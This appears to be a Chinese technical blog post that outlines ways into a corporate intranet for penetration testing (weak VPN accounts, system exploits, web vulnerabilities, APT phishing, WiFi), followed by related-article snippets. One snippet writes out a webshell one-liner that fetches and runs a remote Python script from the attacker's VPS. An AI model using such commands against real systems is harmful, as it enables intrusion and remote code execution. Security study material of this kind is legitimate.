【基础篇】————3、进入内网

最新推荐文章于 2025-08-11 19:07:42 发布
原创 最新推荐文章于 2025-08-11 19:07:42 发布 · 945 阅读 · 10 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。

博客围绕内网渗透展开,介绍了获取内网访问权限的多种方式,包括利用企业弱账号漏洞,如通过VPN、企业运维系统;基于系统漏洞,借助Metasploit等;进行网站应用程序渗透,如SQL注入等;实施APT攻击,像鱼叉式、水坑式攻击;还可通过无线Wifi接入内网。

要想进行内网渗透,我们的前提是要获取内网的访问权限,那么如何获取内网的访问权限呢?

基于企业弱账号漏洞

  • VPN(通过邮箱,密码爆破,社工等途径获取VPN)
  • 企业相关运维系统(zabbix等)

基于系统漏洞进入

网站应用程序渗透

  • SQL注入
  • 跨站脚本(XSS)
  • 跨站请求伪造(CSRF)
  • SSRF
  • 功能/业务逻辑漏洞
  • 其他漏洞等
  • CMS-内容管理系统漏洞
  • 企业自建代理

APT攻击

无线Wifi接入

通过接入无线wifi进入内网,获得内网的访问权限。

【SDL实践指南】安全培训介绍
Fly_鹏程万里
03-27 391
安全并不仅仅是安全团队的本职工作,也是企业的每个研发人员、产品经理、项目经理、企业高管额外的工作,每个企业员工都应该要了解安全基础知识并知道如何在软件和服务中构建安全以使产品更加安全,并在满足业务需求的同时并提供安全价值。 在企业SDL安全建设的第一步就是安全培训,这为企业构建安全体系制定了一个很好的基调,企业可以结合自身特点来制定安全培训计划和安全培训方式,就目前而言很多大公司的安全培训内容都要求必须要贯穿整个SDL流程,但安全培训的目的并非是要确保每个人都成为安全专家,也不是力求要成为熟练的渗透测试人员
《从0到100:DevOps全栈实战手册》第六章:Jenkins全链路教学基础——6.4Jenkins全局工具配置
lee_yanyi的博客
06-30 912
Jenkins全局工具配置是确保构建流程稳定运行的关键,通过注册外部工具路径或自动下载工具,解决“command not found”问题。配置分为自动安装(需网络)和手动配置(内网适用)两种方式,支持JDK、Maven、Git等工具的多版本隔离管理。自动安装需提供工具下载URL,手动配置需预装工具并挂载到容器。通过全局配置避免版本混乱,灵活适配不同项目需求。验证配置后,Jenkins即可调用指定版本工具执行构建任务。
Fpipe的用法
FreeXploiT
10-28 4367
Fpipe的用法经常有人问我这个问题“怎样进入内网”,怎么回答呢,归纳起来就是一句话“突破网关,利用端口重定向进入内网”。首选要突破网关(GetWay),这很容易理解.因为一个内网要访问internet总是必然通过网关接的,至于怎样突破网关,这和进入不是网关的服务器没有什么两样,就不说了。 突破网关以后,我们的目标就是通过网关上网的192.168.21.75。以后的方法就是在网关力端口重定向
【学习笔记】进入内网的几种方法
chualam的博客
10-29 3998
当可以通过ssh连接A 目标访问B ssh ip -lrr //空密码连接 ssh ip -D端口 -CNfg(流量压缩) //端口转发 >>export all_proxy=http://127.0.0.1:端口 当不可以通过ssh 下载反弹shell 的py脚本 通过py启动http (python -m SimpleHTTPServer) curl A的ip/shell.php --data "c=system("curl 我的vps的ip/xx.py|python");" nc -l.
外网进内网的一般流程
huiaixing的博客
11-27 1763
本文介绍了外网进内网的流程,理解整个网络流程可以帮助我们在排查网络问题时更快的发、定位和解决问题!
黑客||教你如何进入内网
热门推荐
weixin_40895548的博客
03-04 4万+
经常有人问我这个问题“怎样进入内网”,怎么回答呢,归纳起来就是一句话“突破网关,利用端口重定向进入内网”。首选要突破网关(GetWay),这很容易理解.因为一个内网要访问internet总是必然通过网关接的,至于怎样突破网关,这和进入不是网关的服务器没有什么两样,就不说了。 突破网关以后,我们的目标就是通过网关上网的192.168.21.75。以后的方法就是在网关力端口重定向,建立包转发。端口重...
宝塔FTP的进阶应用——通过cpolar内网穿透实现远程文件协同管理
最新发布
欢迎来到我的前端博客!这里汇集了关于前端开发的最新技术、实用工具和经验分享。我将为你提供详细的教程、代码示例和实战案例,帮助你掌握Web开发的核心概念和技能。不论你是初学者还是有经验的开发者,这个博客都适合你。
08-11 1246
在服务器运维和开发协作中,文件传输的安全与效率始终是核心关注点之一。宝塔FTP作为宝塔面板内置功能模块,提供了直观的账号管理系统与细粒度权限控制能力,支持开发者快速创建多级用户体系并限定访问路径——这种设计既保障了数据隔离性,又为团队成员分配差异化操作权限提供了技术基础。当需要实现跨网络环境的文件协作时,cpolar内网穿透工具的价值得以充分体现。通过映射FTP服务至公网端口,使用者无需修改原有服务器配置即可安全访问私有云资源——设计师可远程更新网站素材库,运维人员也能在出差途中快速部署补丁包。
运维之思科——NAT基础配置
qq_41911912的博客
07-20 2万+
一、 NAT(网络地址转换) 1、 作用:通过将内部网络的私有IP地址翻译成全球唯一的公网IP地址,使内部网络可以连接到互联网等外部网络上。 2、 优点: 节省公有合法IP地址 处理地址重叠 增强灵活性 安全性 3、NAT的缺点 延迟增大 配置和维护的复杂性 不支持某些应用,可以通过静态NAT映射来避免 4、NAT实现方式 1) 静态转换 IP地址的对应关系是一对一,而且...
谷粒商城微服务分布式基础八——对象存储OSS
D_A_I_H_A_O的博客
04-27 1452
文章目录阿里云对象存储OSS什么是对象存储 OSS相关概念存储类型(Storage Class)存储空间(Bucket)对象/文件(Object)地域(Region)访问域名(Endpoint)访问密钥(AccessKey)OSS的优势 阿里云对象存储OSS 什么是对象存储 OSS 阿里云对象存储服务(Object Storage Service,简称 OSS),是阿里云提供的海量、安全、低成本、...
提权学习之旅——基础
Lemon's blog
07-30 1008
前言: 无论是CTF赛题还是渗透测试,有很多时候拿到WebShell的权限并不高,没有办法继续深,所以需要进行提权操作,方便下一步的进行!看了很多师傅们的博客,大多都是总结下常用思路,对于我这种菜鸡来说还是有点难懂,所以就通过这次总结将理论和实践联系到一起! 基础知识 0x00:什么是提权 提高自己在服务器中的权限,主要针对网站侵过程中,当侵某一网站时,通过各种漏洞提升WEBSHELL权限以夺得该服务器权限。 简单的一句话就是权限提升。例如: Windows:User >> Syste
【文件包含技巧拓展】————3、文件包含漏洞(上)
Fly_鹏程万里
01-30 702
导语: 当程序员在编写代码的过程中,由于使用PHP文件包含函数过滤不严,从而导致了文件包含漏洞。在PHP中用于文件包含的函数有四个: require require_once include include_once include和require区别主要是include在包含的过程中如果出现错误,会抛出一个警告,程序继续正常运行;而require函数出现错误的时候,会直接报错并退出程序...
kali连接内网设置
qq_43390703的博客
10-09 1847
**kali无法正常桥接的问题** 一般用VM安装完kali镜像以后根据默认选项就能够正常上网了。但是如果需要学习渗透的话一般需要用桥接来加内网。所以有时候需要修改网络连接设定。 进入虚拟网络编辑器 点击更改设置,进行选项设定。 之后再去设置虚拟机的设置即可 现在就可以正常连接上内网了。 ...
Linux本地信息收集
Fly_鹏程万里
10-30 558
在获取到webshell之后,经常会遇到Linux的操作系统,这是我们需要对Linux系统本地的敏感资源进行信息收集,为进一步测试做准备,下面就是一些有用的信息获取方式。 收集内核,操作系统等信息 命令 作用 uname -a 打印所有可用的系统信息 uname -r 内核版本信息 uname -n 系统主机名字 hostname 主机名 un...
内网渗透-如何利用msf把流量代理进内网-隧道搭建
weixin_42109829的博客
01-10 8138
0x01 前言 在攻防演练时,当我们拿下主机时,我们要开始对内网进行渗透,常见的手法有,frp,ew,等代理工具,这里我介绍一个工具 msf 模块中的socket 4a代理工具,这里我使用的是msf 5的版本,好像在使用msf 6的版本一直不成功的样子,所以你们做遇到代理不成功的情况下,可以尝试换个msf 5的版本进行尝试。 0x02 生成路由 msf操作 拓扑图如下 首先先生成一个elf 马进行上线 linux 生成木马上线文章—>linux主机生成木马攻击 run autoroute -s ip
4、DNS隧道
Fly_鹏程万里
06-08 1793
0x00 前言前两天和朋友说到代理,随之讨论了一下关于隧道技术,之前也发过一关于DNS隧道技术的文章,不过感觉没有写好,今天就重写一下关于隧道技术的总结;首先这文章是以前写的,也发在乌云过,最近为博客更新一些隧道技术的东西,所以先把这老文章拿出来,后面会更新一些新的东西,也欢迎大家提出新的思路;0x01 概念隧道技术(Tunneling)是一种通过使用互联网络的基础设施在网络之间传递数据的方...
怎样在外网访问内网
cao849861802的博客
06-21 1971
我这边是用的两种方案,一种是直接采用内网穿透,神卓互联或者其他的软件可以实现内网穿透。 另一种是zerotier,这个软件则是在设备上面创建一个虚拟网卡,然后搭建一个vpn,在需要的设备上 ...
分享进入内网的详细步骤
王浩然的博客
05-25 6616
分享进入内网的详细步骤:   想要进入官网,首选要突破网关(GetWay),这很容易理解,因为一个内网要访问internet总是必然通过网关接的,至于怎样突破网关,这和进入不是网关的服务器没有什么两样,就不说了。   突破网关以后,我们的目标就是通过网关(IP为202.98.*.*)上网的192.168.21.75。以后的方法就是在网关力端口重定向,建立包转发。端口重定向分两种(lo
DEFCON 26 | 利用传真功能漏洞渗透进入企业内网(Faxploit)
Fly_鹏程万里
09-06 1294
从远古时代的飞鸽传书到后来的邮政快递,写信人与收信人之间的物理消息传递方式逐渐在演变发展,之后,传真技术的出现从某种程度上说,帮助人们走出了信件传递的黑暗时代。 然而,技术发展到今天,就通信手段而言,我们有电子邮件、社交聊天、移动通信渠道、网络服务和高大上的量子卫星通信等等,但在这种喜新厌旧的信息时代中,传真技术仍然没被淘汰,且依旧被广泛使用。根据简单的谷歌搜索可以发现,网上出现了超过3亿个...
【项目】区块链+人工智能 ---PAI白皮书分析(二)
Fly_鹏程万里
07-25 1668
本文为“行动派AlphaBo”的第104号文。 点赞虽怡情,进化更重要。每天08:48,让我们一起成长、跃迁,心动不如行动。 昨天,我们从项目简介、解决方案和产品分析三个维度分析了PAI项目,今日我们从另外的几个维度对项目进行分析: 团队和投资人(Who)、经济模型分析(How much) 团队和投资人(Who)   PAI的深度战略合作企业OBEN,就是一家技术领先的个人人工智能公司...
2020内网安全攻防实战:ICMP隧道与环境配置详解
内容主要探讨的是AHZY-内网安全攻防知识分享中2020年1月12日的第六章节——"再看ICMP隧道"。在内网安全的攻防战中, ICMP隧道是一种重要的技术手段,特别是在服务器没有开启任何公开端口的情况下,当两台设备...
评论
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
表情包 代码片
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

FLy_鹏程万里

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值